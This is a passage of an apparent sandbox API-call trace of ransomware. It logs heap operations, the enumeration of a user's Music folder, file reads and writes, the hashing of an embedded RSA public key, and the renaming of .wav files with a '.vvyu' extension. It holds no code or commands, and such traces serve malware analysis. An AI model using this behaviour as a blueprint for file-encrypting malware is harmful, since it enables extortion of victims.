hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0203.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0203.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37e8 | out: hHeap=0x620000) returned 1 [0203.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0203.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3818 | out: hHeap=0x620000) returned 1 [0203.277] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0203.277] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0203.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0203.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0203.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0203.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3788 | out: hHeap=0x620000) returned 1 [0203.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0203.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0203.278] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0203.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0203.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0203.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0203.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0203.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0203.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0203.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0203.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0203.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37b8 | out: hHeap=0x620000) returned 1 [0203.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3800 | out: hHeap=0x620000) returned 1 [0203.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0203.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37a0 | out: hHeap=0x620000) returned 1 [0203.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3770 | out: hHeap=0x620000) returned 1 [0203.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0203.282] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0203.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0203.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3758 | out: hHeap=0x620000) returned 1 [0203.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1f00 | out: hHeap=0x620000) returned 1 [0203.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0203.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0203.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0203.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0203.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0203.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0203.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0203.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0203.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0203.285] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x1281c, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x1281c, lpOverlapped=0x0) returned 1 [0203.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0203.286] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x12821, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.286] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0203.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0203.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4930 [0203.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0203.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0203.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0203.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4930 | out: hHeap=0x620000) returned 1 [0203.288] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0203.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0203.288] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.288] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0203.288] CloseHandle (hObject=0x510) returned 1 [0203.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x2ea6a68 [0203.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.294] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\a6C7l-Qq0p-ecvc_8DsT.wav" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\dktsn5wki\\a6c7l-qq0p-ecvc_8dst.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\a6C7l-Qq0p-ecvc_8DsT.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\dktsn5wki\\a6c7l-qq0p-ecvc_8dst.wav.vvyu")) returned 1 [0203.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0203.299] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6eb88 | out: hHeap=0x620000) returned 1 [0203.302] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde1e1910, ftCreationTime.dwHighDateTime=0x1d8a3a7, ftLastAccessTime.dwLowDateTime=0xa572e8b0, ftLastAccessTime.dwHighDateTime=0x1d8a73b, ftLastWriteTime.dwLowDateTime=0xa572e8b0, ftLastWriteTime.dwHighDateTime=0x1d8a73b, nFileSizeHigh=0x0, nFileSizeLow=0x180e5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GWrBK8mbOy.wav", cAlternateFileName="GWRBK8~1.WAV")) returned 1 [0203.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0203.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x2c6eb88 [0203.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0203.303] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\GWrBK8mbOy.wav") returned=".wav" [0203.303] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\GWrBK8mbOy.wav" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\dktsn5wki\\gwrbk8mboy.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0203.303] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=98533) returned 1 [0203.303] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0203.306] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x180bf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.306] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0203.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0203.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0203.308] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.308] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x180e5, lpOverlapped=0x0) returned 1 [0203.309] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0203.309] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.309] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.309] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0203.311] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0203.311] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0203.311] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0203.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0203.311] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0203.311] GetLastError () returned 0x0 [0203.311] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0203.311] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0203.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.311] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0203.311] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0203.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.311] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0203.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0203.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0203.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x180f0) returned 0x2ea99b0 [0203.312] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0203.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0203.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0203.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1f00 [0203.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3758 [0203.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1f48 [0203.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3770 [0203.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37a0 [0203.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3800 [0203.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37b8 [0203.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0203.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0203.313] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0203.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0203.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37a0 | out: hHeap=0x620000) returned 1 [0203.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37b8 | out: hHeap=0x620000) returned 1 [0203.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3800 | out: hHeap=0x620000) returned 1 [0203.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0203.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3800 [0203.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0203.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37b8 [0203.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0203.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea37a0 [0203.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0203.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0203.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0203.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0203.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0203.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0203.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0203.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0203.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0203.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37b8 | out: hHeap=0x620000) returned 1 [0203.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37a0 | out: hHeap=0x620000) returned 1 [0203.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0203.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0203.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3800 | out: hHeap=0x620000) returned 1 [0203.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0203.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0203.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0203.317] GetCurrentThreadId () returned 0x66c [0203.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0203.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea3c30 [0203.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0203.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0203.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0203.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0203.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0203.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0203.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.318] GetCurrentThreadId () returned 0x66c [0203.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0203.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0203.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0203.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0203.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0203.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0203.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0203.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0203.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3800 [0203.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0203.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0203.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0203.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0203.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0203.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0203.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0203.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37a0 [0203.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0203.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0203.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0203.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0203.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0203.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0203.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37b8 [0203.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0203.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0203.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0203.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3788 [0203.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0203.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3818 [0203.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0203.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 